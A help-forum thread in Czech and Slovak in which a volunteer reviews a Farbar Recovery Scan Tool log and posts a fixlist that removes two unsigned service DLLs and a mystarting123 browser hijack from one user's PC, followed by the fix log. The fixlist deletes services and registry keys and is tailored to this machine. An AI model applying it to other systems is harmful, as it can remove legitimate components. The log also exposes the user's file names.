2017-05-20 17:19 - 2015-07-07 15:51 - 00000000 ____D C:\Users\Vojtěch\Downloads\call of duty 2 cz
2017-05-18 21:42 - 2017-05-18 21:42 - 01631604 _____ C:\Users\Vojtěch\Downloads\Hodnocení BP.pdf
2017-05-15 18:15 - 2017-05-15 18:15 - 07894252 _____ C:\Users\Vojtěch\Downloads\PREZENTACE-BAKALÁŘKA.pptx
2017-05-13 21:20 - 2017-05-13 21:20 - 00001503 _____ C:\Users\Vojtěch\Desktop\age3y – zástupce.lnk
2017-05-13 21:18 - 2017-05-13 21:18 - 00001503 _____ C:\Users\Vojtěch\Desktop\age3x – zástupce.lnk
2017-05-10 20:04 - 2017-05-10 20:21 - 00010752 _____ C:\Users\Vojtěch\Desktop\Mama tabulka.xlsx
2017-05-10 13:04 - 2017-05-10 13:05 - 10265563 _____ C:\Users\Vojtěch\Downloads\pozemni-stavitelstvi-bc.pdf
2017-05-10 12:40 - 2017-04-29 00:44 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-10 12:40 - 2017-04-29 00:44 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-10 12:01 - 2017-03-30 15:15 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-10 12:01 - 2017-03-30 15:15 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-10 11:24 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-10 11:24 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-10 11:24 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-10 11:23 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-10 11:23 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-10 11:23 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-10 11:23 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-10 11:23 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-10 11:23 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-10 11:23 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-10 11:23 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-10 11:23 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-10 11:23 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-10 11:23 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-10 11:23 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-10 11:23 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-10 11:23 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-10 11:23 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-10 11:23 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-10 11:23 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-10 11:23 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-10 11:23 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-10 11:23 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-10 11:23 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-10 11:23 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-10 11:23 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-10 11:23 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-10 11:23 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-10 11:23 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-10 11:23 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-10 11:23 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-10 11:23 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-10 11:23 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-10 11:23 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-10 11:23 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-10 11:23 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-10 11:23 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-10 11:23 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-10 11:23 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-10 11:23 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-10 11:23 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-10 11:23 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-10 11:23 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-10 11:23 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-10 11:23 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-10 11:23 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-10 11:23 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-10 11:23 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-10 11:23 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-10 11:23 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-10 11:23 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-10 11:23 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-10 11:23 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-10 11:23 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-10 11:23 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-10 11:23 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-10 11:23 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-10 11:23 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-10 11:23 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-10 11:23 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 11:23 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\wmitomi.dll
2017-05-10 11:23 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2017-05-10 11:23 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2017-05-10 11:23 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmitomi.dll
2017-05-10 11:23 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2017-05-10 11:23 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2017-05-10 11:23 - 2017-03-11 21:34 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-05-10 11:23 - 2017-03-11 21:32 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-05-10 11:23 - 2017-03-11 21:32 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-05-10 11:23 - 2017-03-11 20:49 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-10 11:23 - 2017-03-11 19:58 - 01437696 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-10 11:23 - 2017-03-11 19:54 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-10 11:23 - 2017-03-11 01:38 - 02017624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-10 11:23 - 2017-03-11 01:38 - 00275800 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2017-05-10 11:23 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\wisp.dll
2017-05-10 11:23 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wisp.dll
2017-05-10 11:23 - 2017-03-08 04:44 - 00448285 _____ C:\Windows\system32\ApnDatabase.xml
2017-05-09 22:29 - 2017-05-09 22:29 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-08 17:55 - 2017-05-08 17:55 - 00000000 ____D C:\Users\Vojtěch\Documents\EVE
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\CCP
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\.QtWebEngineProcess
2017-05-08 16:06 - 2017-05-08 16:06 - 00000000 ____D C:\Users\Vojtěch\.EVE
2017-05-08 11:00 - 2012-08-07 11:27 - 00000507 _____ C:\Users\Vojtěch\Desktop\CDKeye + tipy.TXT
2017-05-05 13:33 - 2017-05-05 13:54 - 00000000 ____D C:\Program Files (x86)\Warcraft III
2017-05-05 13:33 - 2017-05-05 13:41 - 00085516 _____ C:\Windows\War3Unin.dat
2017-05-05 13:33 - 2017-05-05 13:38 - 00139264 _____ (Blizzard Entertainment) C:\Windows\War3Unin.exe
2017-05-05 13:33 - 2017-05-05 13:38 - 00002829 _____ C:\Windows\War3Unin.pif
2017-05-05 13:33 - 2017-05-05 13:38 - 00000000 ____D C:\Users\Vojtěch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Warcraft III
2017-05-05 13:33 - 2017-05-05 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Warcraft III
2017-05-05 13:21 - 2017-05-05 13:21 - 00001498 _____ C:\Users\Vojtěch\Desktop\age3 – zástupce.lnk
2017-05-05 11:00 - 2017-05-05 11:00 - 00137517 _____ C:\Users\Vojtěch\Downloads\harmonogram-promoci.pdf
2017-05-04 11:39 - 2017-05-04 11:39 - 00000000 ___HD C:\Windows\msdownld.tmp
2017-05-04 11:39 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2017-05-04 11:39 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2017-05-04 11:39 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2017-05-04 11:39 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2017-05-04 11:39 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2017-05-04 11:39 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2017-05-04 11:39 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2017-05-04 11:38 - 2017-05-04 11:39 - 00000000 ____D C:\Windows\SysWOW64\directx
2017-05-04 11:37 - 2017-05-04 11:37 - 00000000 ____D C:\ProgramData\Age of Empires 3
2017-05-04 11:33 - 2017-05-04 11:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Age Of Empires 3 CZ
2017-05-04 11:26 - 2017-05-04 11:33 - 00000000 ____D C:\Program Files (x86)\Age Of Empires 3
2017-05-04 00:35 - 2017-05-04 02:56 - 2546663424 _____ C:\Users\Vojtěch\Downloads\Age-Of-Empires-III---Kompletní-edice-CZ---t2k9.iso

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-03 13:29 - 2016-07-19 22:16 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3751293310-3690691840-2036008392-1001
2017-06-03 13:21 - 2016-07-19 22:18 - 00000000 ___DO C:\Users\Vojtěch\OneDrive
2017-06-03 13:18 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-03 13:18 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-03 13:12 - 2016-11-02 15:10 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Akamai
2017-06-03 13:04 - 2016-10-14 14:34 - 00000000 ____D C:\Users\Administrator.ERZA-NTB\AppData\Local\Google
2017-06-03 12:37 - 2017-04-10 20:25 - 00000000 ____D C:\World_of_Tanks
2017-06-02 21:23 - 2016-07-20 21:33 - 00003978 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{8A9462CD-B6C3-478F-A1B7-CBA83041838C}
2017-06-02 11:25 - 2016-10-05 11:29 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\CrashDumps
2017-06-02 11:14 - 2016-07-19 22:11 - 00000000 ____D C:\Users\Vojtěch\AppData\Local\Packages
2017-06-02 11:01 - 2014-08-23 03:18 - 00739924 _____ C:\Windows\system32\perfh005.dat
2017-06-02 11:01 - 2014-08-23 03:18 - 00151610 _____ C:\Windows\system32\perfc005.dat
2017-06-02 11:01 - 2014-03-18 12:03 - 01745984 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-02 11:01 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-02 09:23 - 2016-11-03 13:25 - 00000000 ____D C:\Users\Vojtěch\Desktop\PROGRAMY
2017-06-02 08:47 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2017-06-01 21:28 - 2017-02-09 12:54 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-06-01 10:41 - 2014-08-23 02:56 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-31 16:37 - 2017-04-10 19:57 - 00024925 _____ C:\Users\Vojtěch\Desktop\Vyúčtování SolarCell Svoboda.xlsx
2017-05-31 16:17 - 2017-04-07 15:58 - 00000000 ____D C:\Users\Vojtěch\Downloads\fota
2017-05-31 13:27 - 2016-10-06 12:40 - 00003892 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1475750441
2017-05-31 13:27 - 2016-10-06 12:40 - 00001063 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-30 09:22 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\NDF
2017-05-29 13:01 - 2016-11-10 20:06 - 00000000 ____D C:\Users\Vojtěch\Desktop\rozvaděč
2017-05-29 13:00 - 2017-04-27 11:05 - 00000000 ____D C:\Users\Vojtěch\Desktop\fotbal
2017-05-29 12:59 - 2016-11-30 02:07 - 00000000 ____D C:\Users\Vojtěch\Desktop\BAKALÁŘSKÁ PRÁCE
2017-05-26 00:08 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-26 00:06 - 2014-08-23 03:24 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-05-23 10:14 - 2016-11-04 22:44 - 00000000 ____D C:\Windows\system32\MRT
2017-05-23 10:12 - 2016-11-04 22:44 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-22 02:21 - 2016-07-19 22:08 - 00000000 ____D C:\Users\Vojtěch
2017-05-17 23:18 - 2016-10-05 11:25 - 00002219 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-16 15:30 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-15 19:05 - 2016-10-14 14:31 - 00000000 ____D C:\Users\Administrator.ERZA-NTB
2017-05-12 22:30 - 2016-10-06 12:37 - 00158880 _____ (AVAST Software) C:\Windows\system32\Drivers\aswstm.sys
2017-05-11 10:43 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\rescache
2017-05-11 10:19 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-10 12:36 - 2013-08-22 16:44 - 00557080 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-10 12:30 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-10 10:31 - 2017-05-02 01:10 - 00000000 ____D C:\Program Files\PDFCreator
2017-05-09 22:29 - 2016-10-06 12:37 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-09 22:29 - 2016-10-06 12:37 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-09 22:28 - 2017-02-09 12:54 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-09 22:28 - 2016-10-06 12:40 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-09 22:28 - 2016-10-06 12:37 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-04 11:40 - 2017-05-03 12:24 - 00000000 ____D C:\Users\Vojtěch\Documents\My Games

==================== Files in the root of some directories =======

2014-08-23 03:04 - 2014-08-23 03:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-11-03 13:16 - 2016-11-03 13:16 - 0000153 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-06-03 13:29

==================== End of FRST.txt ============================

[JaRon]

pouzi fixlist:

Kód: Vybrat vše

Start
CloseProcesses:
CreateRestorePoint:
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
S2 glory; C:\Users\Vojtěch\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [File not signed] <==== ATTENTION
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/ind ... qdcco9q&q={searchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123



EmptyTemp:
Reboot:
End

pouzitie fixlistu najdes v inych prispevkoch, zial momentalne nemam poruke navody

[Erža]

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-06-2017
Ran by Vojtěch (05-06-2017 10:01:55) Run:1
Running from C:\Users\Vojtěch\Desktop
Loaded Profiles: Vojtěch (Available Profiles: Vojtěch & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION
S2 glory; C:\Users\Vojt�ch\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [File not signed] <==== ATTENTION
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/ind ... qdcco9q&q={searchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123



EmptyTemp:
Reboot:
End
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\System\CurrentControlSet\Services\BIT => key removed successfully
BIT => service removed successfully
HKLM\System\CurrentControlSet\Services\glory => key removed successfully
glory => service removed successfully
Chrome DefaultSearchURL => removed successfully
Chrome DefaultSearchKeyword => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8835338 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 5140507 B
Edge => 0 B
Chrome => 35619365 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 432 B
LocalService => 5728 B
NetworkService => 0 B
Vojtěch => 11159952 B
Administrator.ERZA-NTB => 16325 B

RecycleBin => 0 B
EmptyTemp: => 66 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:02:39 ====

[JaRon]

odstranene, viac problemov tam nevidim

[Erža]

My starting bohužel pořád zůstává v prohlížeči. Každopádně ale děkuji za čistku